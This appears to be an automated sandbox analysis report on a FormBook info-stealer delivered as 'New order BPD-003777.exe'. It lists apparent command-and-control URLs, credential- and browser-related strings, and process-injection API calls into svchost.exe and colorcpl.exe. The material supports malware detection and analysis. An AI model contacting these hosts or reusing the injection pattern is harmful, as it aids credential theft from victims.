8d 07 8d 95 d5 b5 e6 6a 63 bd de ac df 83 00 db ae a1 dc 09 41 52 39 49 f4 98 a9 ee 4d a6 4a 9d a2 ba 4e 6d bb a8 5e 9e 17 9a 59 28 58 d3 4a 21 ee 7d 15 b3 91 b8 f8 b6 98 06 59 7f 18 0f 06 d9 c8 cf 4e c7 8b 69 10 87 af c5 ee 41 34 e9 67 fd 40 7c ee a6 ef 5e 54 90 64 fe 85 72 c9 4d 46 32 9f c5 db fd e4 f2 5c fc 98 2f a6 41 1a 0e 92 f1 30 db cb c9 f1 c9 97 f8 f4 22 f1 c3 ec e8 20 e9 1d 26 fe d9 3f 51 1b cc 2a 51 d1 c4 13 47 e7 f1 f7 9d ec d9 2b f1 66 3f f9 30 c9 bc 4f d7 5e 57 bc 3c Data Ascii: 1dd}n0S8J%PJc&u"0-8W}dCC ,_F)5hs]k-`H'-pn:+X'2t(2!PeEUUPT25(XR8i/F~,o{q$1v+HV,jr@Uj!e!'O.="C):6l!$MZx0]R>kjcAR9IMJNm^Y(XJ!}YNiA4g@\|^TdrMF2\/A0" &?Q*QG+f?0O^W<
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Jan 2025 18:43:11 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=T9%2Fi4SXSepJLeqOMRaFYP9QO3zE7ZFhZbndi6awEg2Af%2Buyo4hdHxIno4XaEc6uPz5jtIiJBBIH7S8IHLwcd6o9098Lu%2BdXXbClwSQFJ5Du14432kQ3k2gunuwRQK%2Ba9WQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9028028998b739f4-YYZalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=13639&min_rtt=13639&rtt_var=6819&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=550&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"

Source: xTzxorEdKnFN.exe, 00000007.00000002.3630102556.000000000335E000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://cikolatasampuan.xyz/
Source: xTzxorEdKnFN.exe, 00000007.00000002.3630102556.000000000303A000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://maximumgroup.co.za/bdcw/?PZtTT8P0=qaHXDXYx2LkqUhRgEdOOXwktUSYbuju1qW3oIWQPB3qEMr74muRmFAO/aMK
Source: xTzxorEdKnFN.exe, 00000007.00000002.3628819504.0000000000873000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.6hcwz.info
Source: xTzxorEdKnFN.exe, 00000007.00000002.3628819504.0000000000873000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.6hcwz.info/vslm/
Source: colorcpl.exe, 00000006.00000002.3632441933.0000000007D5B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: colorcpl.exe, 00000006.00000002.3632441933.0000000007D5B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: colorcpl.exe, 00000006.00000002.3632441933.0000000007D5B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: colorcpl.exe, 00000006.00000002.3632441933.0000000007D5B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: colorcpl.exe, 00000006.00000002.3632441933.0000000007D5B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: colorcpl.exe, 00000006.00000002.3632441933.0000000007D5B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: colorcpl.exe, 00000006.00000002.3632441933.0000000007D5B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: colorcpl.exe, 00000006.00000002.3630401859.0000000005898000.00000004.10000000.00040000.00000000.sdmp, xTzxorEdKnFN.exe, 00000007.00000002.3630102556.0000000002EA8000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://jackys.shop/tc4z/?PZtTT8P0=ny3bLW3OcbOKXixzoTTFtaWz9zwbCAlCkXueetxIQf0InYmFA4wH3zQZz5ZeXWajS
Source: colorcpl.exe, 00000006.00000002.3628717504.0000000002DD6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_a
Source: colorcpl.exe, 00000006.00000002.3628717504.0000000002DD6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: colorcpl.exe, 00000006.00000002.3628717504.0000000002DD6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: colorcpl.exe, 00000006.00000002.3628717504.0000000002DD6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: colorcpl.exe, 00000006.00000002.3628717504.0000000002DD6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033I
Source: colorcpl.exe, 00000006.00000002.3628717504.0000000002DD6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: colorcpl.exe, 00000006.00000002.3628717504.0000000002DD6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: colorcpl.exe, 00000006.00000003.2450670494.0000000007D3A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
Source: colorcpl.exe, 00000006.00000002.3632441933.0000000007D5B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: colorcpl.exe, 00000006.00000002.3630401859.0000000005BBC000.00000004.10000000.00040000.00000000.sdmp, xTzxorEdKnFN.exe, 00000007.00000002.3630102556.00000000031CC000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://wx.longwaysun.com/app/register.php?site_id=2239&topId=64819/t4o7/
Source: colorcpl.exe, 00000006.00000002.3630401859.0000000005BBC000.00000004.10000000.00040000.00000000.sdmp, xTzxorEdKnFN.exe, 00000007.00000002.3630102556.00000000031CC000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://wx.longwaysun.com/app/register.php?site_id=2239&topId=64819/t4o7/

Source: C:\Users\user\Desktop\New order BPD-003777.exe

Code function: 0_2_0029912D GetCursorPos,ScreenToClient,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetWindowLongW,

0_2_0029912D

Source: C:\Users\user\Desktop\New order BPD-003777.exe

Code function: 0_2_00319576 NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,

0_2_00319576

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 1.2.svchost.exe.700000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.svchost.exe.700000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.3629802561.0000000002F90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3629846283.0000000002FE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3628819504.0000000000820000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3628491294.00000000029B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2272300484.0000000000700000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2272460449.0000000002980000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2276142415.0000000003F50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3629829522.0000000003310000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

System Summary

Binary is likely a compiled AutoIt script file

Source: New order BPD-003777.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: New order BPD-003777.exe, 00000000.00000002.1777619146.0000000000342000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_e30f714c-6
Source: New order BPD-003777.exe, 00000000.00000002.1777619146.0000000000342000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_c5e26f50-9

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: New order BPD-003777.exe

Source: C:\Windows\SysWOW64\svchost.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\Desktop\New order BPD-003777.exe	Code function: 0_2_00283170 NtdllDefWindowProc_W,KillTimer,SetTimer,RegisterClipboardFormatW,CreatePopupMenu,PostQuitMessage,SetFocus,MoveWindow,	0_2_00283170
Source: C:\Users\user\Desktop\New order BPD-003777.exe	Code function: 0_2_00299052 NtdllDialogWndProc_W,	0_2_00299052
Source: C:\Users\user\Desktop\New order BPD-003777.exe	Code function: 0_2_002990A7 NtdllDialogWndProc_W,	0_2_002990A7
Source: C:\Users\user\Desktop\New order BPD-003777.exe	Code function: 0_2_003190A1 SendMessageW,NtdllDialogWndProc_W,	0_2_003190A1
Source: C:\Users\user\Desktop\New order BPD-003777.exe	Code function: 0_2_0031911E DragQueryPoint,SendMessageW,DragQueryFileW,DragQueryFileW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,DragFinish,NtdllDialogWndProc_W,	0_2_0031911E
Source: C:\Users\user\Desktop\New order BPD-003777.exe	Code function: 0_2_0031A2D7 NtdllDialogWndProc_W,	0_2_0031A2D7
Source: C:\Users\user\Desktop\New order BPD-003777.exe	Code function: 0_2_00319380 NtdllDialogWndProc_W,	0_2_00319380
Source: C:\Users\user\Desktop\New order BPD-003777.exe	Code function: 0_2_003193CB NtdllDialogWndProc_W,	0_2_003193CB
Source: C:\Users\user\Desktop\New order BPD-003777.exe	Code function: 0_2_00319400 ClientToScreen,NtdllDialogWndProc_W,	0_2_00319400
Source: C:\Users\user\Desktop\New order BPD-003777.exe	Code function: 0_2_0031953A GetWindowLongW,NtdllDialogWndProc_W,	0_2_0031953A
Source: C:\Users\user\Desktop\New order BPD-003777.exe	Code function: 0_2_00319576 NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,	0_2_00319576
Source: C:\Users\user\Desktop\New order BPD-003777.exe	Code function: 0_2_002997C0 GetParent,NtdllDialogWndProc_W,	0_2_002997C0
Source: C:\Users\user\Desktop\New order BPD-003777.exe	Code function: 0_2_00318AAA NtdllDialogWndProc_W,	0_2_00318AAA
Source: C:\Users\user\Desktop\New order BPD-003777.exe	Code function: 0_2_00298BA4 NtdllDialogWndProc_W,	0_2_00298BA4
Source: C:\Users\user\Desktop\New order BPD-003777.exe	Code function: 0_2_00319E74 NtdllDialogWndProc_W,	0_2_00319E74
Source: C:\Users\user\Desktop\New order BPD-003777.exe	Code function: 0_2_00319EF3 GetClientRect,GetCursorPos,ScreenToClient,NtdllDialogWndProc_W,	0_2_00319EF3
Source: C:\Users\user\Desktop\New order BPD-003777.exe	Code function: 0_2_00319F86 GetSystemMetrics,GetSystemMetrics,MoveWindow,SendMessageW,SendMessageW,ShowWindow,InvalidateRect,NtdllDialogWndProc_W,	0_2_00319F86
Source: C:\Users\user\Desktop\New order BPD-003777.exe	Code function: 0_2_00318FC9 GetCursorPos,TrackPopupMenuEx,GetCursorPos,NtdllDialogWndProc_W,	0_2_00318FC9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0072C803 NtClose,	1_2_0072C803
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03272B60 NtClose,LdrInitializeThunk,	1_2_03272B60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03272DF0 NtQuerySystemInformation,LdrInitializeThunk,	1_2_03272DF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032735C0 NtCreateMutant,LdrInitializeThunk,	1_2_032735C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03274340 NtSetContextThread,	1_2_03274340
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03274650 NtSuspendThread,	1_2_03274650
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03272BA0 NtEnumerateValueKey,	1_2_03272BA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03272B80 NtQueryInformationFile,	1_2_03272B80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03272BE0 NtQueryValueKey,	1_2_03272BE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03272BF0 NtAllocateVirtualMemory,	1_2_03272BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03272AB0 NtWaitForSingleObject,	1_2_03272AB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03272AF0 NtWriteFile,	1_2_03272AF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03272AD0 NtReadFile,	1_2_03272AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03272F30 NtCreateSection,	1_2_03272F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03272F60 NtCreateProcessEx,	1_2_03272F60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03272FA0 NtQuerySection,	1_2_03272FA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03272FB0 NtResumeThread,	1_2_03272FB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03272F90 NtProtectVirtualMemory,	1_2_03272F90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03272FE0 NtCreateFile,	1_2_03272FE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03272E30 NtWriteVirtualMemory,	1_2_03272E30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03272EA0 NtAdjustPrivilegesToken,	1_2_03272EA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03272E80 NtReadVirtualMemory,	1_2_03272E80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03272EE0 NtQueueApcThread,	1_2_03272EE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03272D30 NtUnmapViewOfSection,	1_2_03272D30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03272D00 NtSetInformationFile,	1_2_03272D00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03272D10 NtMapViewOfSection,	1_2_03272D10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03272DB0 NtEnumerateKey,	1_2_03272DB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03272DD0 NtDelayExecution,	1_2_03272DD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03272C00 NtQueryInformationProcess,	1_2_03272C00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03272C60 NtCreateKey,	1_2_03272C60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03272C70 NtFreeVirtualMemory,	1_2_03272C70
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03272CA0 NtQueryInformationToken,	1_2_03272CA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03272CF0 NtOpenProcess,	1_2_03272CF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03272CC0 NtQueryVirtualMemory,	1_2_03272CC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03273010 NtOpenDirectoryObject,	1_2_03273010
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03273090 NtSetValueKey,	1_2_03273090
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032739B0 NtGetContextThread,	1_2_032739B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03273D10 NtOpenProcessToken,	1_2_03273D10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03273D70 NtOpenThread,	1_2_03273D70
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 6_2_04BD4650 NtSuspendThread,LdrInitializeThunk,	6_2_04BD4650
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 6_2_04BD4340 NtSetContextThread,LdrInitializeThunk,	6_2_04BD4340
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 6_2_04BD2CA0 NtQueryInformationToken,LdrInitializeThunk,	6_2_04BD2CA0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 6_2_04BD2C70 NtFreeVirtualMemory,LdrInitializeThunk,	6_2_04BD2C70
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 6_2_04BD2C60 NtCreateKey,LdrInitializeThunk,	6_2_04BD2C60
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 6_2_04BD2DF0 NtQuerySystemInformation,LdrInitializeThunk,	6_2_04BD2DF0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 6_2_04BD2DD0 NtDelayExecution,LdrInitializeThunk,	6_2_04BD2DD0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 6_2_04BD2D30 NtUnmapViewOfSection,LdrInitializeThunk,	6_2_04BD2D30
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 6_2_04BD2D10 NtMapViewOfSection,LdrInitializeThunk,	6_2_04BD2D10
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 6_2_04BD2E80 NtReadVirtualMemory,LdrInitializeThunk,	6_2_04BD2E80
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 6_2_04BD2EE0 NtQueueApcThread,LdrInitializeThunk,	6_2_04BD2EE0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 6_2_04BD2FB0 NtResumeThread,LdrInitializeThunk,	6_2_04BD2FB0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 6_2_04BD2FE0 NtCreateFile,LdrInitializeThunk,	6_2_04BD2FE0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 6_2_04BD2F30 NtCreateSection,LdrInitializeThunk,	6_2_04BD2F30
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 6_2_04BD2AF0 NtWriteFile,LdrInitializeThunk,	6_2_04BD2AF0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 6_2_04BD2AD0 NtReadFile,LdrInitializeThunk,	6_2_04BD2AD0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 6_2_04BD2BA0 NtEnumerateValueKey,LdrInitializeThunk,	6_2_04BD2BA0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 6_2_04BD2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,	6_2_04BD2BF0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 6_2_04BD2BE0 NtQueryValueKey,LdrInitializeThunk,	6_2_04BD2BE0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 6_2_04BD2B60 NtClose,LdrInitializeThunk,	6_2_04BD2B60
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 6_2_04BD35C0 NtCreateMutant,LdrInitializeThunk,	6_2_04BD35C0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 6_2_04BD39B0 NtGetContextThread,LdrInitializeThunk,	6_2_04BD39B0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 6_2_04BD2CF0 NtOpenProcess,	6_2_04BD2CF0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 6_2_04BD2CC0 NtQueryVirtualMemory,	6_2_04BD2CC0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 6_2_04BD2C00 NtQueryInformationProcess,	6_2_04BD2C00
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 6_2_04BD2DB0 NtEnumerateKey,	6_2_04BD2DB0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 6_2_04BD2D00 NtSetInformationFile,	6_2_04BD2D00
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 6_2_04BD2EA0 NtAdjustPrivilegesToken,	6_2_04BD2EA0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 6_2_04BD2E30 NtWriteVirtualMemory,	6_2_04BD2E30
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 6_2_04BD2FA0 NtQuerySection,	6_2_04BD2FA0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 6_2_04BD2F90 NtProtectVirtualMemory,	6_2_04BD2F90
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 6_2_04BD2F60 NtCreateProcessEx,	6_2_04BD2F60
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 6_2_04BD2AB0 NtWaitForSingleObject,	6_2_04BD2AB0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 6_2_04BD2B80 NtQueryInformationFile,	6_2_04BD2B80
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 6_2_04BD3090 NtSetValueKey,	6_2_04BD3090
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 6_2_04BD3010 NtOpenDirectoryObject,	6_2_04BD3010
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 6_2_04BD3D10 NtOpenProcessToken,	6_2_04BD3D10
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 6_2_04BD3D70 NtOpenThread,	6_2_04BD3D70
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 6_2_029D9340 NtReadFile,	6_2_029D9340
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 6_2_029D91D0 NtCreateFile,	6_2_029D91D0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 6_2_029D9630 NtAllocateVirtualMemory,	6_2_029D9630
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 6_2_029D94D0 NtClose,	6_2_029D94D0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 6_2_029D9430 NtDeleteFile,	6_2_029D9430

Source: C:\Users\user\Desktop\New order BPD-003777.exe	Code function: 0_2_0029D064	0_2_0029D064
Source: C:\Users\user\Desktop\New order BPD-003777.exe	Code function: 0_2_002AE1E0	0_2_002AE1E0
Source: C:\Users\user\Desktop\New order BPD-003777.exe	Code function: 0_2_002891C0	0_2_002891C0
Source: C:\Users\user\Desktop\New order BPD-003777.exe	Code function: 0_2_002A1394	0_2_002A1394
Source: C:\Users\user\Desktop\New order BPD-003777.exe	Code function: 0_2_002A1706	0_2_002A1706
Source: C:\Users\user\Desktop\New order BPD-003777.exe	Code function: 0_2_00314873	0_2_00314873
Source: C:\Users\user\Desktop\New order BPD-003777.exe	Code function: 0_2_00287920	0_2_00287920
Source: C:\Users\user\Desktop\New order BPD-003777.exe	Code function: 0_2_002A19B0	0_2_002A19B0
Source: C:\Users\user\Desktop\New order BPD-003777.exe	Code function: 0_2_002A7A4A	0_2_002A7A4A
Source: C:\Users\user\Desktop\New order BPD-003777.exe	Code function: 0_2_0028CAF0	0_2_0028CAF0
Source: C:\Users\user\Desktop\New order BPD-003777.exe	Code function: 0_2_002A1C77	0_2_002A1C77
Source: C:\Users\user\Desktop\New order BPD-003777.exe	Code function: 0_2_002A1F32	0_2_002A1F32
Source: C:\Users\user\Desktop\New order BPD-003777.exe	Code function: 0_2_0029AFAC	0_2_0029AFAC
Source: C:\Users\user\Desktop\New order BPD-003777.exe	Code function: 0_2_0146E778	0_2_0146E778
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00718693	1_2_00718693
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0070E043	1_2_0070E043
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00710033	1_2_00710033
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00703090	1_2_00703090
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00716893	1_2_00716893
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0070E193	1_2_0070E193
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0070E25B	1_2_0070E25B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00701A10	1_2_00701A10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00701A04	1_2_00701A04
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00702C90	1_2_00702C90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00702C8D	1_2_00702C8D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_007025D9	1_2_007025D9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_007025C0	1_2_007025C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_007025BE	1_2_007025BE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0072EE23	1_2_0072EE23
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0070FE13	1_2_0070FE13
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032FA352	1_2_032FA352
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0324E3F0	1_2_0324E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033003E6	1_2_033003E6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032E0274	1_2_032E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032C02C0	1_2_032C02C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03230100	1_2_03230100
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032DA118	1_2_032DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032C8158	1_2_032C8158
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032F41A2	1_2_032F41A2
